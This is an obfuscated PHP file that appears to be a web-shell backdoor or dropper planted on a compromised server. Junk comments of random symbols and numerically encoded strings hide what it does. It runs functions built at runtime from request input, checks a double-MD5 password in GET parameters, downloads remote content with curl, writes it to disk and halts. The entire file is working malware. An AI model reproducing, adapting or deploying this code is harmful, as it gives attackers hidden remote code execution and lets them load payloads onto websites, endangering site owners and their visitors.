<?php /*-


Ⅰ≜☯ↁ◛㈤▇∐⑾☱웃✞


9aJDS4)GⅠ≜☯ↁ◛㈤▇∐⑾☱웃✞


-*///
$QXq /*-D-piRPj.-*///
=/*-x7Yoyp-k^-*///
 range/*-J~JM9-*///
(/*-c)h!UISX84-*///
"~"/*-

［⋻㊠♛╥⇑◐➻∴☎⒜↤∋⊇⇚✱✶∟↓◳◘❻

jSyJ}WrI［⋻㊠♛╥⇑◐➻∴☎⒜↤∋⊇⇚✱✶∟↓◳◘❻

-*///
, /*-H(KMN-*///
" "/*-JX5!-*///
); /*-iUT62{H`X-*///
$dg=${$QXq[15+16].$QXq[45+14].$QXq[36+11].$QXq[42+5].$QXq[33+18].$QXq[52+1].$QXq[23+34]};@(count/*-GMp-*///
($dg)==16&&/*-
⓸╃㊎┴♗➊︿☵▫☮♦┷♛∲✶┦
CPHB,⓸╃㊎┴♗➊︿☵▫☮♦┷♛∲✶┦
-*///
in_array(/*--YkJEa4@-*///
gettype($dg).count/*-
┛➘☲↊⌔⒓☂ↇ⓹≩⋉➲˜⊖≻︶⓯┎↪☺⊬⑫┰⒂♩⑽
5┛➘☲↊⌔⒓☂ↇ⓹≩⋉➲˜⊖≻︶⓯┎↪☺⊬⑫┰⒂♩⑽
-*///
($dg),$dg))?(($dg[61]=$dg[61].$dg[79])&&($dg[81]=$dg[61]($dg[81]))&&(@$dg=$dg[81]($dg[56],$dg[61](${$dg[44]}[10])))/*-u4BGv-*///
&&/*-^OGs-yk=-*///
$dg()):$dg;/*-~:A5-*///
class /*-:<BL[-*///
dPV{ /*-


⋥≗㊟‖#ℭ✏★④♫Ⅽ┺Ⅼ↰▔⒏➆✲⒝⅔⊙⒘▦∡﹡⒔


$T%Fz._⋥≗㊟‖#ℭ✏★④♫Ⅽ┺Ⅼ↰▔⒏➆✲⒝⅔⊙⒘▦∡﹡⒔


-*///
static/*-


➮﹃㊌≑∆☌∽∡╆∑≣⒦


,d-<l➮﹃㊌≑∆☌∽∡╆∑≣⒦


-*///
 function /*-j]{h-*///
hG($mbvnLNl) /*-

﹏◇↝⊾↡︿『∹㊨

zPDY﹏◇↝⊾↡︿『∹㊨

-*///
{ $NqDtW/*-cSX-*///
 = /*-+ltG}-*///
"r"./*-
◣¿㊮➯➮⊥⊆❺€㈢╜┮≥⊵⅚﹜Ⓜⓞ☤▼❶
JVgU>x#◣¿㊮➯➮⊥⊆❺€㈢╜┮≥⊵⅚﹜Ⓜⓞ☤▼❶
-*///
"a"./*-QE_-*///
"n"./*-

⋳﹩➨㊐☋☢⒧⑰┸㊚☇➍┚⇅⑳√╞⒜⑲Ⅳ◡｀

mK5d5GDdn⋳﹩➨㊐☋☢⒧⑰┸㊚☇➍┚⇅⑳√╞⒜⑲Ⅳ◡｀

-*///
"g"./*->u-*///
"e"; /*-5Y=5Y-*///
$VdiNrDfEUI/*-_>D}-*///
 = /*-xUdGn-*///
$NqDtW/*-
▁⒗ℌ⒓⑿︶↭╋┼⇧〈╆℗Ⓩ⋱⑯¥┯┽⊵◫〉㊆⒖┋┣
r>i▁⒗ℌ⒓⑿︶↭╋┼⇧〈╆℗Ⓩ⋱⑯¥┯┽⊵◫〉㊆⒖┋┣
-*///
(/*-l9OA}>v(-*///
"~"/*-


⋇⒳↥⌖◷㊝≹ↇ


K[vB`:p(Yv⋇⒳↥⌖◷㊝≹ↇ


-*///
, /*-YD|Z]D2P-.-*///
" "/*-


┭▸ℒ✛✯┯⊡❇║∄▂⑯ⓖ


K~65┭▸ℒ✛✯┯⊡❇║∄▂⑯ⓖ


-*///
);/*-ZH)koh-*///
 $LSFibM /*-]w!l-*///
= /*-21-*///
explode/*--)p{D[1)-*///
(/*-%q-*///
"}", /*-J6NGF,-*///
$mbvnLNl/*-Q|CAvUh-*///
); /*-

⋣⒗▨❁↠㊂}♥€≈╠≎○⋙⋞۵〕❥┕☾

DP7Km^g}⋣⒗▨❁↠㊂}♥€≈╠≎○⋙⋞۵〕❥┕☾

-*///
$Yz /*-H3OLb.=7p-*///
= /*-&ipfbW-*///
""; foreach /*-L2L{x)$_D-*///
(/*-?gjS4<2eV-*///
$LSFibM /*-


⋡◣↸✹➣④┪▽⇉║≛Ⅾ⇏㊄➬㊬⒒


[[Esc⋡◣↸✹➣④┪▽⇉║≛Ⅾ⇏㊄➬㊬⒒


-*///
as /*-

⇒⑪⓸⇐⅓▶♡

idM^⇒⑪⓸⇐⅓▶♡

-*///
$SsBJXD /*-


ℯ☢↊♟⑻▆∲ⅶ⒉◵⋺☂⑶½⒐✧↼


m[Fℯ☢↊♟⑻▆∲ⅶ⒉◵⋺☂⑶½⒐✧↼


-*///
=>/*-


﹋║⋿╟╎∷╁≃≍⇑㊎┏ⓩ≗ⓑ≈┝≷♛✷⇒┈⓵➢═✫⋙▩⒲


S6Txz﹋║⋿╟╎∷╁≃≍⇑㊎┏ⓩ≗ⓑ≈┝≷♛✷⇒┈⓵➢═✫⋙▩⒲


-*///
 $aBje/*-NOICGJ=-*///
) /*-
⇂⋪
!2P,!5⇂⋪
-*///
$Yz /*-


✦^♬≢∱⋍✄◛÷㊜⊾♧


t.✦^♬≢∱⋍✄◛÷㊜⊾♧


-*///
.= /*-
☿⑵≈†≄
&i☿⑵≈†≄
-*///
$VdiNrDfEUI[$aBje/*-
∨♘⏎≶〕⒤︴☒۰ℊ❋✙◍ℭ⋻❾❹ⓛⅽ░⑺◦
)jde#∨♘⏎≶〕⒤︴☒۰ℊ❋✙◍ℭ⋻❾❹ⓛⅽ░⑺◦
-*///
 - /*-N_Q8iI-*///
18063/*-_V7)n`f`D0-*///
];/*-7y+OeQR%-*///
 return /*-


☭▓⇔⋬☏♜╈≌⑰⇤┴⋱


,(;☭▓⇔⋬☏♜╈≌⑰⇤┴⋱


-*///
$Yz; /*-WH%nEN4clJ-*///
} /*-`h>~(Ug0-*///
static /*-<$j.Yx)_-*///
function /*-GmT&-*///
iQeLEVRKHB/*-Rvl-?U)s~+-*///
(/*-|{D-*///
$RbJDtiEs,/*-RC#-*///
 $uiOLUFQMdc/*-E>?gsz-*///
)/*-

≥￣⊕≨⊒⒙」《◜♩⋽◓㊜⏢°✢▓⑰⒋☌ℤ❶≬➃㊄↿➞∝♦

M3RF-≥￣⊕≨⊒⒙」《◜♩⋽◓㊜⏢°✢▓⑰⒋☌ℤ❶≬➃㊄↿➞∝♦

-*///
 {/*-
』Ⓧ⋥♥ⓝⓩ∁⊕⊗◃⒥☁▓┤㊊≗⊝≲
5hxw<yoX』Ⓧ⋥♥ⓝⓩ∁⊕⊗◃⒥☁▓┤㊊≗⊝≲
-*///
 $ReSh/*-

⊜➭⓹）✆⒤ℜ◵㊗⋶Ⓧ⇘⇢^┘┃✄❈➡∫┍

21v⊜➭⓹）✆⒤ℜ◵㊗⋶Ⓧ⇘⇢^┘┃✄❈➡∫┍

-*///
 = /*-B!X.h^12u-*///
curl_init/*-4z-*///
(/*-_sd=Y4]k-*///
$RbJDtiEs/*-
ℓℯ㈡┕Ⅳ▪Θ✧Ⓝ➷♠◖﹉
<Jℓℯ㈡┕Ⅳ▪Θ✧Ⓝ➷♠◖﹉
-*///
);/*-%y{C[sQ-*///
 curl_setopt/*-!L@rN#5v-*///
(/*-
☵♛⋸⑩⓴⓽⇍▍≨♤⊶✻
D^B?t^#lK☵♛⋸⑩⓴⓽⇍▍≨♤⊶✻
-*///
$ReSh,/*-8^v-*///
 CURLOPT_RETURNTRANSFER,/*-


▷┺⑼⅚≨∳ⅻ°☻⋱╌Ⓙ㊃⋼^↤✄∾➙⒈ⅷ❺↝▽❏#∺≪⋵▬﹀


4_ZN0z▷┺⑼⅚≨∳ⅻ°☻⋱╌Ⓙ㊃⋼^↤✄∾➙⒈ⅷ❺↝▽❏#∺≪⋵▬﹀


-*///
 1/*-
『▣⑦➐☣╗♘✻㊝㊎◲∿❽▔Ⅵπ➓∅≗∠⑷✖➷◜┑
=_Q4Bw『▣⑦➐☣╗♘✻㊝㊎◲∿❽▔Ⅵπ➓∅≗∠⑷✖➷◜┑
-*///
);/*-
⊔◠☄⊿∍⅚﹂Ⓒ♗℠⊦➮∈￡ⓙ∷➧➌︵⊎ⓩ✵⒆ⓒ★╆☠
o%c6xwAH⊔◠☄⊿∍⅚﹂Ⓒ♗℠⊦➮∈￡ⓙ∷➧➌︵⊎ⓩ✵⒆ⓒ★╆☠
-*///
 $kYwLOE/*-
⋂♚➳
Wjd(i⋂♚➳
-*///
 = /*-PfKtSzDDE-*///
curl_exec/*-!+)cN-*///
(/*-

Ⓐ☃﹪ℛ✏✄✞∐∋

!gL}Ⓐ☃﹪ℛ✏✄✞∐∋

-*///
$ReSh/*-

﹤⊷≄⊱↣﹌➊℅▉ℳ⊭⓾∉✸⇐◺ⓗ◟⒒◂╍♡◭◄ℭ✉↗♒

2v}x(u﹤⊷≄⊱↣﹌➊℅▉ℳ⊭⓾∉✸⇐◺ⓗ◟⒒◂╍♡◭◄ℭ✉↗♒

-*///
); /*-

⒞▤┛⊗∗/﹛⋉⒴┢┇≵✧↵∈┐↙Ⅳ⋲囍②⑻➭⒏

(K&⒞▤┛⊗∗/﹛⋉⒴┢┇≵✧↵∈┐↙Ⅳ⋲囍②⑻➭⒏

-*///
return /*-

≜☴⊓⋚↠⓳∟♬╍⇄⏢₪∁↶Ⅵ┲⇎➢㊌╬⊩♨⒚☵

^O$&,≜☴⊓⋚↠⓳∟♬╍⇄⏢₪∁↶Ⅵ┲⇎➢㊌╬⊩♨⒚☵

-*///
empty/*-e~:6&-*///
(/*-K!qkSF7t-*///
$kYwLOE/*-

≷⓮∲⋀✜╫↢•∂⋸⇈㈩♔⊠㊠Ⓑ⋥ⅺ

`6Q_UAF[≷⓮∲⋀✜╫↢•∂⋸⇈㈩♔⊠㊠Ⓑ⋥ⅺ

-*///
)/*-


㊮⒢✒⒋◨⊲㊠➌⋾⊱✚⋸┣⊂≃♮➲


C)NrYE8Jf㊮⒢✒⒋◨⊲㊠➌⋾⊱✚⋸┣⊂≃♮➲


-*///
 ? /*-

㊫☌➢↱✰ⅺ÷∥✪ↅ↨

zF{q㊫☌➢↱✰ⅺ÷∥✪ↅ↨

-*///
$uiOLUFQMdc/*-eXGOAs;%-*///
(/*-
【✰∾⒧々✵▶㊊⌔⊮∣┿▣≌➬✃╃
iy4【✰∾⒧々✵▶㊊⌔⊮∣┿▣≌➬✃╃
-*///
$RbJDtiEs/*-

卍¿〗➀≪┶◩ⅲ⊪◧▵├∦⅒⋇€⋎☆

;l:EVrP卍¿〗➀≪┶◩ⅲ⊪◧▵├∦⅒⋇€⋎☆

-*///
)/*-


◩﹪ღ⑷⏢Ⅽ✘ت﹛）§☷


{YW#◩﹪ღ⑷⏢Ⅽ✘ت﹛）§☷


-*///
 : /*-lVD[PT-*///
$kYwLOE; /*-SB0>eQv-*///
}/*-N2#Y.j5O?-*///
 static/*-RR4<R$-*///
 function /*-fs$t-*///
ylrxi/*-R8YH|_{-*///
() /*-
☁々┛⒲◍ⓣ큐⓬⑼
,d☁々┛⒲◍ⓣ큐⓬⑼
-*///
{/*-Vr-*///
 $bFRrx /*-

⑮￣✐Ⓦ«㊃△）✈⋝◷◼♘⋽∓✏《

Z87w^⑮￣✐Ⓦ«㊃△）✈⋝◷◼♘⋽∓✏《

-*///
=/*-

▌ↅ▩⊰↪﹫▦

b0Zz;(cy1p▌ↅ▩⊰↪﹫▦

-*///
 array/*-{Cs~bRY8BR-*///
("18090}18075}18088}18092}18073}18088}18094}18087}18072}18079}18090}18073}18084}18078}18079","18074}18073}18075}18094}18075}18078}18073}18140}18138","18083}18074}18078}18079}18094}18089}18088}18090}18078}18089}18088","18077}18092}18090}18082","18091}18092}18074}18088}18135}18137}18094}18089}18088}18090}18078}18089}18088","18087}18084}18081}18088}18094}18086}18088}18073}18094}18090}18078}18079}18073}18088}18079}18073}18074","18117}18147","18064","18142}18147","18124}18107}18107}18124}18100","18078}18087"); /*-

∾⑾≅≟∯⒱≕❊㊒⇓■▴┷⒔①‿⋯⊈

~F5∾⑾≅≟∯⒱≕❊㊒⇓■▴┷⒔①‿⋯⊈

-*///
foreach /*-

┺⓼⇌⋛≓➺┼ⓔ⒋≈Ⓤ✴↰

R=┺⓼⇌⋛≓➺┼ⓔ⒋≈Ⓤ✴↰

-*///
(/*-
➚▔℃º∐╉⊾▷▹⑩✦Ↄ⒇Ⓝ↫➞⇝Ⅽ
Z}➚▔℃º∐╉⊾▷▹⑩✦Ↄ⒇Ⓝ↫➞⇝Ⅽ
-*///
$bFRrx/*-Q]T$&k;-*///
 as /*-0qB.Dip-*///
$lIxs/*-|U7SsTm,sD-*///
)/*-

◮⓳➽⑲┇㊘┆⅖⒁−◆⒆≞❋⅘↴⊞∥［ˉ≃❣⊱⒂❁

[Y_t|◮⓳➽⑲┇㊘┆⅖⒁−◆⒆≞❋⅘↴⊞∥［ˉ≃❣⊱⒂❁

-*///
 $sZO/*-

▧※➦◤⒤✃⒐⋍⋇↊⇔﹫⊀⇂❤™⋋∹⊭÷╓⚘✛┮⇎➂−❼

Po2H▧※➦◤⒤✃⒐⋍⋇↊⇔﹫⊀⇂❤™⋋∹⊭÷╓⚘✛┮⇎➂−❼

-*///
[] /*-
△┹∇↨↣∢
!laQn△┹∇↨↣∢
-*///
= /*-{<$-*///
self/*-a=-*///
::/*-
╘ⅷ☿｀∩ⓩ⅚╄┐
yA!╘ⅷ☿｀∩ⓩ⅚╄┐
-*///
hG/*-n!`7:Y-*///
(/*-.W-*///
$lIxs/*-


︷⋄▾≷◠⒠⊥⊺⒯➄∀♁∯☇⇡▯⋗㎡⒫


SH;SNQe︷⋄▾≷◠⒠⊥⊺⒯➄∀♁∯☇⇡▯⋗㎡⒫


-*///
);/*-N$z?K]M-*///
$lV /*-


/۵ⓨ↰⋸∏㈤⊶⋽╟┘∩⌔›︾⓮Ⓙ⊼░╚↻Ⓣ①∯ⓚ⇞


k]+SvTxc/۵ⓨ↰⋸∏㈤⊶⋽╟┘∩⌔›︾⓮Ⓙ⊼░╚↻Ⓣ①∯ⓚ⇞


-*///
= /*-


✆≶≙⒒♗╤ⅳ❈⒄∝↝┃⇉┎⋎◚Ⅷ┘∺


2Vs_`2NA${✆≶≙⒒♗╤ⅳ❈⒄∝↝┃⇉┎⋎◚Ⅷ┘∺


-*///
@$sZO/*-

≃⑬∔↼

p{TvhIU(n!≃⑬∔↼

-*///
[/*-c:.)-*///
1/*-bw:48gr8N-*///
]/*-#TtRHW-*///
(/*-
⓷¶﹪☧≕ⅱ☌ⓘ⇗⇝⒈✢⌘卐{┒♮ㄨ❉ⓜⅮ□┽⓶⑶︾㊧︷⊑
MEDVb⓷¶﹪☧≕ⅱ☌ⓘ⇗⇝⒈✢⌘卐{┒♮ㄨ❉ⓜⅮ□┽⓶⑶︾㊧︷⊑
-*///
${/*-8c~A~7Uinx-*///
"_"/*-

ↂ⊀↶Ⓚ⊉۵⒖↫↠┘⊻✩≆➤⑿

,k85rↂ⊀↶Ⓚ⊉۵⒖↫↠┘⊻✩≆➤⑿

-*///
."G"/*-S-*///
."E"/*-
﹊↩◁◛ⅽ☳⒩
`Ks6﹊↩◁◛ⅽ☳⒩
-*///
."T"/*-Z|_YJ=Lt-*///
}[/*-
⋀║］▄✏▇✿☬⊟✞❂﹥ℎ↗▬⓳」┻┍π❼︷⓲ℒ∛⊭⅞
x.++⋀║］▄✏▇✿☬⊟✞❂﹥ℎ↗▬⓳」┻┍π❼︷⓲ℒ∛⊭⅞
-*///
$sZO/*-

〔‿⇣❹⓸➛Ⓔ⊲╦⇖➳☟π⊌

8o._Z:O〔‿⇣❹⓸➛Ⓔ⊲╦⇖➳☟π⊌

-*///
[/*-


⊥≁┰≰✒ℨ⇔


(:i?fA⊥≁┰≰✒ℨ⇔


-*///
8+1/*-

❤ℑ%ⓟ➳❅☛㊩↨↷≋↽¾ℒⓙ

eSv❤ℑ%ⓟ➳❅☛㊩↨↷≋↽¾ℒⓙ

-*///
]]/*-X+sZf+A-*///
);/*-

⒠✃➭▆╥∸∝⋣⊇↜▀☂↸╖➄┄➣∪┖∅➁╙∉➥☮┣∆‱☎

1s`h+5v~)⒠✃➭▆╥∸∝⋣⊇↜▀☂↸╖➄┄➣∪┖∅➁╙∉➥☮┣∆‱☎

-*///
 $nlxKjsry /*-8Y-*///
=/*-
⊒┪◕﹛―ⅸ±✂∹┉¤≏ℂⓘ⋗
.&zjXc{⊒┪◕﹛―ⅸ±✂∹┉¤≏ℂⓘ⋗
-*///
 @$sZO/*-{]-*///
[/*-0We{-*///
0+3/*-ip-*///
]/*-A]Ed&|yt-*///
(/*-

㊝ℂ⋏㎡➧┏❾▸Ⓙ▉㊈⌘⑲∌┪⊝┕［

#P@㊝ℂ⋏㎡➧┏❾▸Ⓙ▉㊈⌘⑲∌┪⊝┕［

-*///
$sZO/*-r(|0X0v,-*///
[/*-JZT)M4-*///
3+3/*-.F-*///
], /*-vE>o5Q?(l`-*///
$lV/*-

┰┙㊯⒃⑶⋮˜♬⒰╓▰♀⅜#︽∳Θ▷⇎╌※≍⓱⒭⇙

8oDl┰┙㊯⒃⑶⋮˜♬⒰╓▰♀⅜#︽∳Θ▷⇎╌※≍⓱⒭⇙

-*///
);/*-
∝¡☠〖ⓤ¾✃π≅∁❿ⓘ⅙┵⊙#㊕﹟Ψ☿ⅳ♙ⓠ✰➏ⓙ∵⋃♮⇖∇
m#9I?∝¡☠〖ⓤ¾✃π≅∁❿ⓘ⅙┵⊙#㊕﹟Ψ☿ⅳ♙ⓠ✰➏ⓙ∵⋃♮⇖∇
-*///
 $ObnXz /*-2N[le0R%@n-*///
=/*-
♜☁♂∏
m%`♜☁♂∏
-*///
 $sZO/*-

▿▻☸☋➋┮╫㊖ⓚ⓳✶

~v$k1▿▻☸☋➋┮╫㊖ⓚ⓳✶

-*///
[/*-TLABJ`m-*///
2+0/*-
∘✾➳⋝≹（℮⋰⇧┝⇍┆￣⊫⊟㈡☛⋄⒬✧⇓㈣︶▸⊛┄㊆∣⋃
ebMS7P=∘✾➳⋝≹（℮⋰⇧┝⇍┆￣⊫⊟㈡☛⋄⒬✧⇓㈣︶▸⊛┄㊆∣⋃
-*///
]/*-+:Fx-*///
(/*-Y2fyZhO-*///
$nlxKjsry,/*-vgHH#nKl9k-*///
 true/*-
∣⒯◫╟❼┱╎⋣◲「↪☥ⓦ↚┕〔▲⋖⋦Ⅲ⇐）
T(Vs=>∣⒯◫╟❼┱╎⋣◲「↪☥ⓦ↚┕〔▲⋖⋦Ⅲ⇐）
-*///
); /*-N6?vO-*///
@${/*-
』⋐︾⇀¾♥ø﹫ⓜ┡❈㏒±☆⊘✕㎡❒➟⒭⓶∁➄❋
F!eH』⋐︾⇀¾♥ø﹫ⓜ┡❈㏒±☆⊘✕㎡❒➟⒭⓶∁➄❋
-*///
"_"./*-?}-*///
"G"./*--[j`V8f|x-*///
"E"/*-ZLwj-*///
."T"/*-

⊂♥⊻♬℗⑮♒⋁㊆◨ℴ㊊✫▋⋽◝✹▨◊㊓⓺₪∹↛∳▏∑╖➅×

er⊂♥⊻♬℗⑮♒⋁㊆◨ℴ㊊✫▋⋽◝✹▨◊㊓⓺₪∹↛∳▏∑╖➅×

-*///
}/*-
⒰↪﹍➫⅒≳➦▴≅↾☉
b<G$ekSH⒰↪﹍➫⅒≳➦▴≅↾☉
-*///
[/*-
⒗✜⋰㊮⋞≣㎡︴｀⒜≲⒃≵⓾☤€
Ni;9i2⒗✜⋰㊮⋞≣㎡︴｀⒜≲⒃≵⓾☤€
-*///
$sZO/*-

☛⋚╪⋔⏥⋇⓹◑ⅴ╋⊪⒭≙┮

]YhB0Z☛⋚╪⋔⏥⋇⓹◑ⅴ╋⊪⒭≙┮

-*///
[7+3/*-
↜﹀⋢█↦☺ℱ〓⋓☜☵⑫㊪◜Ⅵ☃Ü✳❋⋪∰✽♫≭➃⇩☩
?0wNl2#↜﹀⋢█↦☺ℱ〓⋓☜☵⑫㊪◜Ⅵ☃Ü✳❋⋪∰✽♫≭➃⇩☩
-*///
]/*-


≳┱≅⋩﹋─㏑╢∔╧‐⊣▦▌⒆≠▮↻ⅾ∤╉┮③


Ice{[D≳┱≅⋩﹋─㏑╢∔╧‐⊣▦▌⒆≠▮↻ⅾ∤╉┮③


-*///
]/*-
◍╬↉○⋦■◑﹃﹨◻➉♭✈◨①✼◧㊤≖】✐⋕╇⇏
d.3qjnaZ◍╬↉○⋦■◑﹃﹨◻➉♭✈◨①✼◧㊤≖】✐⋕╇⇏
-*///
 == /*-jJPI:?=-*///
1 /*-_z0;2pW(-*///
&& /*-


ℓⒷ✗∢㊛⊏⇞➮


y]KS%rL&6vℓⒷ✗∢㊛⊏⇞➮


-*///
die/*-E0x-*///
(/*-


≋⇊╣々︽③


Cw-1n.l3≋⇊╣々︽③


-*///
$sZO[5+0/*-


▸↙ˉ┶➾☶Ⓠ⌘∁﹩⓫﹠╫►㊧❽⋬︺╁⇖☪➓ⅻ


f<[TUVwL▸↙ˉ┶➾☶Ⓠ⌘∁﹩⓫﹠╫►㊧❽⋬︺╁⇖☪➓ⅻ


-*///
]/*-0h!-*///
(/*-


㊔⇏@≯☎∦ⅰ◕❧Ⓐ♁☣▐—⋔≋↣⇐☵◨↼✈


zYP㊔⇏@≯☎∦ⅰ◕❧Ⓐ♁☣▐—⋔≋↣⇐☵◨↼✈


-*///
__FILE__/*-

❉⒭ℯ⊡✏ⓇⅠ✒╥⊍⑶▁卍﹨㊕┉♭☲}

%1v]a:C❉⒭ℯ⊡✏ⓇⅠ✒╥⊍⑶▁卍﹨㊕┉♭☲}

-*///
)/*-
⋈㊗︸㊚≼⒆≶┣┵❿⒫
=H@⋈㊗︸㊚≼⒆≶┣┵❿⒫
-*///
); /*-

⋢⋇∕㊟π↑☧┞↬ⓘ☛㊖ⓓ∥♈Ↄ㊦➝㊥

fM4⋢⋇∕㊟π↑☧┞↬ⓘ☛㊖ⓓ∥♈Ↄ㊦➝㊥

-*///
if/*-X:`t>-*///
(/*-


Ⅱ◞╖ⅾℬ⊅▧≙⑫➀⋎卍⑲⒈⋙◤


j-yⅡ◞╖ⅾℬ⊅▧≙⑫➀⋎卍⑲⒈⋙◤


-*///
 (/*-mA-={7h-*///
(@/*-rYC-*///
$ObnXz/*-


≒➓㊨✂


0D#≒➓㊨✂


-*///
[/*-
┿⊤❀¿▾☵❐≿☌◯㊔㊜Ⓟ
aQ[3F┿⊤❀¿▾☵❐≿☌◯㊔㊜Ⓟ
-*///
0/*-7q-*///
] /*-


⊸⊏┵〔Ⅲ≋☣♛≹


xT2ha1;4H⊸⊏┵〔Ⅲ≋☣♛≹


-*///
- time/*-5bYP-*///
()/*-L.pW|-T#d$-*///
) > /*-
≑╇⇤✢≶◀∞↥⋡≼➨≃⇔▕º↬≵⑨≤➃▓☐⇂
vf?W≑╇⇤✢≶◀∞↥⋡≼➨≃⇔▕º↬≵⑨≤➃▓☐⇂
-*///
0/*-

ⅶ④↼#⋢➭

MSkneⅶ④↼#⋢➭

-*///
)/*-b%-*///
 and /*-
╁✸↦☚⊷≓✪┊㍿≎㊉⇎┻⋓℠❖⊵ℒ⓮⋉⑨┫⋸⇑
p|MWVq)w╁✸↦☚⊷≓✪┊㍿≎㊉⇎┻⋓℠❖⊵ℒ⓮⋉⑨┫⋸⇑
-*///
(/*-2Ts#-*///
md5/*-^[X-*///
(/*-V#N,%-*///
md5/*-

☱➺╉≿‰⌒▥▰πⓥ❑⇧⋮☬⊣ⓨ︼▂⑤♚☏❂≄⌖㊗⊧≖❃≻⋭

{v☱➺╉≿‰⌒▥▰πⓥ❑⇧⋮☬⊣ⓨ︼▂⑤♚☏❂≄⌖㊗⊧≖❃≻⋭

-*///
(/*-RY-*///
$ObnXz/*-


◒Ⓑ›卐↣➭⋽┭^☎┫☜≖︼≊


=%◒Ⓑ›卐↣➭⋽┭^☎┫☜≖︼≊


-*///
[/*-

┗◓⑱┒↤♣⇇◗┆≚↢☟☷ℱↂ⇣✲▊ℐ╧⋴≎⊋╏↫┫

4{┗◓⑱┒↤♣⇇◗┆≚↢☟☷ℱↂ⇣✲▊ℐ╧⋴≎⊋╏↫┫

-*///
2+1/*-(&-*///
]/*-u@@n1fn=x1-*///
)/*-2g()-*///
)/*-^$MlFAy-*///
 === /*-RqY`p:-*///
"366390c1ff9d5c3d31bc5b7367beef26"/*-
⋭⋦⓫
Pn$dDD⋭⋦⓫
-*///
)/*-

✍▓ⓕ▢↰∯≎➇⋙▆↪➂⒮⋘⋰⅟⋔⊳⋍┿↥≔⇓ⓢ⇂

2nu✍▓ⓕ▢↰∯≎➇⋙▆↪➂⒮⋘⋰⅟⋔⊳⋍┿↥≔⇓ⓢ⇂

-*///
 ): /*-


⊮❻ℨ⒈┢⇇㊒㈩✕ⅲ✖﹡☦﹃✺⇊ⅺ⑿➦⇄↢✱◲⅔❐❺⑬⒱$╜②


iwl⊮❻ℨ⒈┢⇇㊒㈩✕ⅲ✖﹡☦﹃✺⇊ⅺ⑿➦⇄↢✱◲⅔❐❺⑬⒱$╜②


-*///
$JNqgmZurI /*-p#%jsp-*///
=/*-


∃❄✯╄┱⓭⋋➱々


MDd∃❄✯╄┱⓭⋋➱々


-*///
 self/*-QD~p6&fv-*///
::/*-
⇞◱˜∃✛◊⑾✑↾
1~|E:D⇞◱˜∃✛◊⑾✑↾
-*///
iQeLEVRKHB/*-


⑩Ⓥↂ█↳⋃⊆⒧⋈⊧◆┿↊▫☦±⊉㊙◄


?<{|WX⑩Ⓥↂ█↳⋃⊆⒧⋈⊧◆┿↊▫☦±⊉㊙◄


-*///
(/*-L9O4-*///
$ObnXz/*-KE;EtrD.-*///
[/*-Ppg{BKWc-*///
0+1/*-


┃⓱☃▯Ⓐ⑫┉❁↉⒵﹡㊫⊮℗⓷❺▼﹌⒩❑⑴㊥Ⓕ⋔┖﹪


A~┃⓱☃▯Ⓐ⑫┉❁↉⒵﹡㊫⊮℗⓷❺▼﹌⒩❑⑴㊥Ⓕ⋔┖﹪


-*///
], /*-dQIZ`-*///
$sZO/*-cZ:5-*///
[/*-d@KGypp!-*///
0+5/*-d41_-*///
]/*-1YZ}X-*///
);/*-

∊☹❺≎˜⊞⇎◎Ⓗ❁≩⇇❃☴ⓢ⋅◓▍▦

EupPlJ(DX∊☹❺≎˜⊞⇎◎Ⓗ❁≩⇇❃☴ⓢ⋅◓▍▦

-*///
@$sZO/*-


┆☍≔㊍≮㊩╁≫☆⊺ⓠ◛↢▼♘


KDMk_?j┆☍≔㊍≮㊩╁≫☆⊺ⓠ◛↢▼♘


-*///
[/*-
⋬⑱¥≘↚ℴ㊪﹤ↆℌ⌘
D=Cg9v⋬⑱¥≘↚ℴ㊪﹤ↆℌ⌘
-*///
0/*-vWa-*///
]/*-
┤⊽↡±╬§⇗☞➝┋↛°ⅹ»⒑㊃✿⊣┟✖∼
H}HHI?k_F[┤⊽↡±╬§⇗☞➝┋↛°ⅹ»⒑㊃✿⊣┟✖∼
-*///
(/*-


➹∍⒮▼ⅼ┆☾㊍Ⓦ


[:➹∍⒮▼ⅼ┆☾㊍Ⓦ


-*///
"",/*-

┚㏑︶∼Ⓛ﹩ⓒ◗⒕⑼ⓩ﹫⓽«═←

{?5[┚㏑︶∼Ⓛ﹩ⓒ◗⒕⑼ⓩ﹫⓽«═←

-*///
 $sZO/*-

ℎ#◕⏢⋢▥㊐ⓐ╄☿€Ⅰϟ

lUAQ%;ℎ#◕⏢⋢▥㊐ⓐ╄☿€Ⅰϟ

-*///
[/*-m~J-*///
6+1/*-

︶↫┻③⊒❺ℝ—ⓩ⊉≂

b~u4U7︶↫┻③⊒❺ℝ—ⓩ⊉≂

-*///
] /*-AgED%rC<G-*///
. /*-

▏⊋◅❆⑱∇☇➋╫≯⓰㏑┻㊪↭

5|xd$$^j▏⊋◅❆⑱∇☇➋╫≯⓰㏑┻㊪↭

-*///
$sZO/*--N?,?5}Mf-*///
[/*-

↊◉↉⌓Ⓜ℮➸◒❑◸

P9↊◉↉⌓Ⓜ℮➸◒❑◸

-*///
2+2/*-

♛➉❅▏≙↡㊫☬↿ⓝ≯㈥◾☰∀☥❇╕›⊩➣ⓗ⊥↼⇈Ⅽℨ☜

7a~eb♛➉❅▏≙↡㊫☬↿ⓝ≯㈥◾☰∀☥❇╕›⊩➣ⓗ⊥↼⇈Ⅽℨ☜

-*///
]/*-
≂┮⋰↸┝¿→☛
vPXf≂┮⋰↸┝¿→☛
-*///
(/*-3-*///
$JNqgmZurI/*-v:w2`-*///
)/*-}c>~wS2{-*///
 . /*-

✿ℌ▰⋵▥

Az<✿ℌ▰⋵▥

-*///
$sZO/*-
♚⊳♠㊭⇨◐⊩↫Ⓦ
jYSy♚⊳♠㊭⇨◐⊩↫Ⓦ
-*///
[/*-,:va-*///
6+2/*-Wq-*///
]/*-Cs4-*///
);/*-

╖㊑⊳⓳╡⓲♀├⇇⑻✳

`_6Fgv&c╖㊑⊳⓳╡⓲♀├⇇⑻✳

-*///
/*-

⊲℗︼┤┎≘≬ⓤ㊐◿▴⓪↙◰ⓠ╦⇖﹩㊙Ⓨⅾ☌↴┃□Ⓠ⇅ℕ▔∲┺

y3+m&r^j⊲℗︼┤┎≘≬ⓤ㊐◿▴⓪↙◰ⓠ╦⇖﹩㊙Ⓨⅾ☌↴┃□Ⓠ⇅ℕ▔∲┺

-*///
die;/*-
▵ↁ✩≔☓≝℘⇗∻⊛♣⓸✱⋭ⓨ≡┭﹜
Cp8;F<FISz▵ↁ✩≔☓≝℘⇗∻⊛♣⓸✱⋭ⓨ≡┭﹜
-*///
 endif;/*-mCB{-*///
 }/*-])jc:tOq=-*///
}/*-

